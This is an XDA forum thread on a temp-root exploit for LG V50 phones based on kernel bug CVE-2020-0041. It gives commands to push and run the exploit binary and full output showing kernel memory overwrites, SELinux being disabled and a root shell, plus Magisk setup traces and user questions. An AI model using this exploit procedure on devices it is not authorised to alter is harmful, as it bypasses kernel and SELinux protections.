• Introducing XDA Computing: Discussion zones for Hardware, Software, and more!    Check it out!

[LG V50] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread


Senior Member
Sep 11, 2019
LG V40
Can I do the sprint g8 volte and wifi calling fix for TMobile, using this method on a v50. I know I'll have to change somethings. But my worry is changing build.prop and 2 other files with a locked bootloader?

Also if we can get a sprint v50 unlocked bootloader and then see if we can get the TMobile 5g fix. Since TMobile killed 5g for the phone since it didn't work with TMobile 5ge or fake 5g kn n71
You'll have to unlock the bootloader for any volte fix. Join the telegram group please


Nov 2, 2014
I keep hearing about telegram and yet I don't have any idea how to join or find it. I know I'm old I guess.

Also I hope the kdz handling changes with TMobile owning sprint now and if they convert the v50 sprint model I won't need to root or volte fix. But it may be worth it since the 5g scam from TMobile killing 5g on devices because of tower bugs in Nokia equipment. The s20 had the same patch that needed applied to make it work again


Senior Member
Sep 11, 2019
LG V40
I keep hearing about telegram and yet I don't have any idea how to join or find it. I know I'm old I guess.

Also I hope the kdz handling changes with TMobile owning sprint now and if they convert the v50 sprint model I won't need to root or volte fix. But it may be worth it since the 5g scam from TMobile killing 5g on devices because of tower bugs in Nokia equipment. The s20 had the same patch that needed applied to make it work again
That very likely won't change unfortunately as there's differences in hardware, and they can't do anything remotely to switch hardware locks. I mean maybe they will somehow push an update or make a kdz for the Sprint model, but again, they probably don't care and won't do it.
For the telegram group just search "lg v50" in telegram; apparently it's against the rules to post links for that here


Nov 2, 2014
They already converted sprint S10 and s20 to TMobile. And with the 1 million customers moved to TMobile from sprint. And putting more strain on old 2g and 3g equipment has caused a 11 day up and down outages. Heck the Monday they moved all those customers over caused a huge outage that the FCC is now having an investigation.

LG reasons for upgrading LG v50
1. Cold boot exploit.
2. Ransom ware
3. LG v50 Android 11 eventually.

TMobile reason to update
1. Risking LG partnerships on budget phone market.
2. More strain on old equipment
3. CEO promising 1st Gen 5g phones compatibility
(S10 already converted)
Not converting many phones to TMobile can also cost them customers especially ones that paid for a flagships. Customers like myself was less willing to purchase a new device from T-Mobile or sprint because it wasn't worth the contracts and they actually didn't offer it free for the upgrade they still wanted money for the s20 replacement. Which was very unfortunate. But this caused many sprint customers to not upgrade the LG v50. The issue is when roaming on TMobile from sprint the volte also doesn't work so it's a matter of time that TMobile will have more issue the next wave of devices being put on TMobile towers if they don't provision volte on the network


Senior Member
Feb 11, 2012
Is the LM-V450PM rootable with this exploit? My S8+'s screen cracked again, it's time to get a new phone.

Sent from my SM-G955F using Tapatalk


Senior Member
Jun 27, 2015
Is it possible to use this root exploit on another phone like the V30? I'm trying to root the H932 model without the ridiculous FWUL and LAF method. It's already bootloader unlocked, I just need to flash the TWRP recovery image but LG is known for bricking download mode on T-Mobile phones which wont allow you to boot or flash any images. It has the August 2019 LG Security patch and is running Pie with the 4.4.153 kernel.


Feb 28, 2019
Just flashed "LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0", as it was the freshest one. The first time i tried a binary from OP it seemed to hung up on step
> Reallocating content of 'write8_inode' with controlled data.................
Then I stopped it with Ctrl+C, took it out of the dual screen case and then it worked as intended. The problem is, when I close the root cli to push some additional files, I run this binary again and now it reboots the phone for some reason. The phone seems to work fine, but every time the binary passes "write8_inode" it reboots the phone. Is there something I might irreversably screw so I need to reflash, or is there a simpler way to get back to root cli?
UPD: seemed to work on 5th, I think, attempt. Seems that I didn't brick the needed component and now even magisk works. I guess I'll leave it there for someone, it's magisk-setup first, then binary, then magisk-start, everything else caused reboot.
Last edited:


Senior Member
Jan 18, 2013
is there a way to root or downgrade and then root my sprint lg v50 running v450p20f?
i can switch to a different slot and it will show 450p20e

Top Liked Posts

  • There are no posts matching your filters.
  • 26
    temp root exploit for LG V50 ThinQ with android 10 firmware
    including temporal magisk setup from the exploit

    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.14 that is used with LG phones running Android 10 with March security patch level.
    This work has been done upon request of @Inerent who contributed not only with very fine donations, but also did all the testing on his LG phone, as I do not own any LG phone myself.

    As an addon I have implemented setup of magisk v20.4 from temp root exploit included su permission asking notification support, that has been also a hell of work to get working.

    You can find currently running fw version with 'getprop ro.vendor.lge.factoryversion' command run in an adb shell.
    • LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0 - LG V50 ThinQ with V500N20m fw, 2020-03-01 security patch level
    • LMV500NAT-00-V20f-LAO-COM-JAN-31-2020+0 - LG V50 ThinQ with V500N20f fw, 2020-01-01 security patch level
    • LMV500NAT-00-V20b-LAO-COM-DEC-23-2019+0 - LG V50 ThinQ with V500N20b fw, 2019-12-01 security patch level
    • LMV500AT-00-V20g-LAO-COM-MAR-10-2020+0
    • LMV500AT-00-V20a-LAO-COM-JAN-24-2020+0
    • LMV500AT-00-V20e-LAO-COM-JAN-23-2020+0
    • LMV450AT-00-V20a-LAO-COM-JAN-15-2020-ARB00+2 - LG V50 ThinQ Sprint fw, 2020-01-01 security patch level
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the v50g8-mroot3.zip with the exploit attached in this post and unzip it
    • use 'adb push v50g8-mroot3 /data/local/tmp' and get temp root with following commands in 'adb shell':
      cd /data/local/tmp
      chmod 755 ./v50g8-mroot3

    If it worked, you should see something like this:
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # getenforce
    root_by_cve-2020-0041:/data/local/tmp # id
    uid=0(root) gid=0(root) groups=0(root) context=kernel
    root_by_cve-2020-0041:/data/local/tmp #

    In case you get 'target is not supported', you may list supported targets with
    ./v50g8-mroot3 -T
    and try to force one close to yours using '-t num' option.

    Please see the 2nd post for magisk setup from temp root details.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot partition, can result with a not anymore booting phone.
    In such case you would need a way to emergency flash stock firmware to recover.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions until bootloader unlock is achieved.
    Some partitions might still be possible to modify - for example in case of sony xperia phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    Exploit sources for all releases are available at my github here.

    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    If you like my work, you can donate using the Donate to Me button with several methods there.

    Already donated:
    Thank you very much to all who donated or are about to donate.

    To enjoy the temporal root with apps asking for root permission, you can now start magisk v20.4 from the root shell provided by the exploit.
    • download the v50g8-mroot3.zip with the exploit attached in the first post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push v50g8-mroot3.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      cd /data/local/tmp
      unzip v50g8-mroot3.zip
      chmod 755 v50g8-mroot3 magisk-setup.sh magisk-start.sh
    • get temp root and start magisk up with following commands in 'adb shell':
      cd /data/local/tmp
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3
      just this point should be done after each reboot to get magisk running again.
      NOTE: please be sure to enter each command separately, line after line - do not paste all in a single block and do not put them in a script.
      There are reasons this is divided in 3 stages. With this approach I got the best stability, while putting ./v50g8-mroot3 together with -1 and/or -2 stuff in a single script run resulted with a reboot most of the time.
      Phases 2 and 3 need to be split for functional reasons to start magisk with working su permission asking notification.

    If it worked, you should see something like this:

    flashlmdd:/ $ cd /data/local/tmp
    flashlmdd:/data/local/tmp $ ./v50g8-mroot3
    [+] factoryversion = LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                     
    + FRESH=false 
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                     
    + FRESH=false 
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2 
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config 
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config 
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148 
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate 
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                     
    + FRESH=false 
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3 
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd 
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC='' 
    + timeout=10 
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10 
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165 
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10 
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9 
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                       
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.14.117-perf #1 SMP PREEMPT Tue Mar 10 18:44:38 KST 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                               

    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
    You can even re-enable selinux like this from 'adb shell':
    su -c 'setenforce 1'
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    The exploit works based on use after free, that means it depends on state of memory heap and how it changes during exploit time.
    That means there is some portion of unpredictability and a chance that something else is overwritten than hoped for by shaping the heap.
    So to get best results, one should stop anything that could run in background, like:
    • set airplain mode, turn off wifi and bluetooth so there is no data connection at all
    • set "Stay awake" to ON while charging (i.e. using adb shell) in developer options
    • disable auto updates of system and apps
    • debloat your system so useless apps do not run in background
    • reboot your phone having all the above
    • wait two minutes after boot up with phone unlocked, screen on connected to PC via usb cable having 'adb shell' already active (checking with 'uptime' command)
    • start the exploit
    • after getting root shell and succesfuly starting magisk, do not forget to properly exit the temp root shell by use of 'exit' command two times, so the 'adb shell' with the exploit is ended with the rest of clean up
    • 2020-05-11 : Initial release (V500N20m-testJ) supporting V500N20m all Korean variants
    • 2020-05-16 : multiple targets supported (v50g8-root)
    • 2020-05-20 : v50g8-dump tool to dump kernel space memory available in G8 thread
    • 2020-05-24 : implemented support for magisk start from the exploit (v50g8-mroot), added support for V50 Sprint with 2020-01-01 security patch level
    • 2020-06-10 : fixed problem when V50 rebooted/crashed soon after obtaining temp root shell, released as v50g8-mroot2
    • 2020-06-23 : hopefully stability improved even more with V50 allowing stable magisk start from temp root, released as v50g8-mroot3
    Received 150 USD to my paypal from Kevin Borges with following comment:
    KanBorges said:
    Thank you so much for your work. This is all the money in the bounty I set up on Gofundme. com. My username in XDA is @KanBorges . Again, thank you! Hopefully you can get twrp/magisk soon.
    Thank you and all other contributors for the donations.
    I've updated the first post (not only the donations list but added some more clarifications too).

    Please note, as discussed since beginning with @Inerent, only the temp root exploit has been supposed to be implemented by me.
    There is however available an engineering booloader, that may eventually allow to unlock bootloader after flashing from temp root.
    This needs to be tested first and can involve some risks to brick the phone.
    I do not own any LG phone (and do not even want one), so I am not doing that, sorry.

    But I've already checked few things regarding the engineering bootloader and I can conclude, that it could be compatible in the sense that it most likely would not brick the device.
    The reason I see that comparing stock firmware ABL image and the eng bootloader (aka ABL) seems that both use the same signing root certificate and they both have identical OU info in the signature certificate:
            OU=07 0001 SHA256,
            OU=06 0000 MODEL_ID,
            OU=05 00000000 SW_SIZE,
            OU=04 0031 OEM_ID,
            OU=03 0000000000000001 DEBUG,
            OU=02 000A50E100310000 HW_ID,
            OU=01 000000000000001C SW_ID
    If it would work with android 10 is another question though.
    Please find attached source for split utility, to get some parts of the image likely to start with a signature certificate.
    Those parts then can be converted to text form representation of the certificate via following command for example:
    openssl x509 -in LUN4_abl_a_COM3.img-001238 -inform der -text -noout > LUN4_abl_a_COM3.img-001238.txt
    Ok guys, OK!!!!
    Here is a guide made for noobs for Root (download, extract and copy root file inside platform tools folder) and Backup in it, using Adb Platform Tools

    Root and Backup V50 Korea

    1. Download LG V50 Root (extract it and copy inside platform tools folder), Platform Tools ADB and LG USB Drivers 4.4.2 and install it

    2. Connect USB then Enable Developer Options and USB Debugging and enable Stay Awake Screen

    3. Turn off wifi, data, bluetooth restart phone, unlock screen and let it 1 minute to load all processes

    4. Run Power shell command from inside platform tools folder (SHIFT+right mouse and open power shell here) and type cmd and hit enter

    5. Run command - adb devices - a pupup should appear on your phone - tap Allow and Remember it on your phone!

    6. Run one by one the following commands

    adb push V500N20m-testJ /data/local/tmp
    adb shell
    cd /data/local/tmp
    chmod 755 ./V500N20m-testJ

    7. When rooted you will have this lines in terminal
    [*] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp #

    If root is not achieved or phone restarts by itself repeat from step 3

    Backup Important non KDZ Stuff like IMEI

    1. Download this file backupselected.sh and move it inside your adb program This is already pushed to Platform Tools folder so ignore it

    2. Run this command from cmd
    adb push backupselected.sh /data/local/tmp

    3. Obtain Temp Root and from root shell run these
    chmod -R 777 /data/local/tmp

    4. Backup will be saved in Download folder on your phone

    Usefull Commands - Maybe @j4nn can help us with more usefull commands
    rm *.* - delete all files
    rm -rf (folder name) - delete that folder
    adb push (folder or file name) /data/local/tmp - copy that folder or file name to that /data/local/tmp address
    cd /data/local/tmp - then - pm install (appname) - installs it
    @quantan, most likely not, due to dm-verity/AVB 2.0 - it is a temp root...
    Magisk (with possibly limited functionality) may be eventually started from the exploit, but it seems not to work yet...